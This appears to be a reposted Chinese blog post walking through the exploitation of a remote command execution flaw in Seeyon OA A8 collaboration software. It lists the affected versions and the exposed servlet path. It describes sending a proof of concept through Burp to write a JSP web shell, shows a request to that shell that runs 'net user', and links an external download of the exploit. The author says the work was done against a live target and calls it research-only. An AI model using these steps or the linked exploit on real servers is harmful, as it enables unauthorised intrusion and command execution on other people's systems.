致远OA-A8系统的0day远程命令执行的实战

1.环境是实战,漏洞已经提交,打码子处理

2.详细漏洞信息和修补参考CNVD官网查看https://www.cnvd.org.cn/webinfo/show/5095

3漏洞影响范围

漏洞影响的产品版本包括:

致远A8-V5协同管理软件 V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1

4漏洞的复现

先采集一波url,找到对应版本,这个就不细说了

第一步

先访问这个路径,看有没有开启远程Servlet接口暴露

/seeyon/htmlofficeservlet

成功反馈
在这里插入图片描述

第二步

搞出Burp进行改包,上POC
在这里插入图片描述
发包 回包
在这里插入图片描述

这算是写入了

第三步

调用命令执行
访问 /test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+net user
在这里插入图片描述

附上POC 请勿用非法用途,只供研究和学习

链接:https://pan.baidu.com/s/11Yy49Fu5kc2uuisIzPbPLA
提取码:0qk7
复制这段内容后打开百度网盘手机App,操作更方便哦

发布了46 篇原创文章 · 获赞 12 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/god_zzZ/article/details/94562862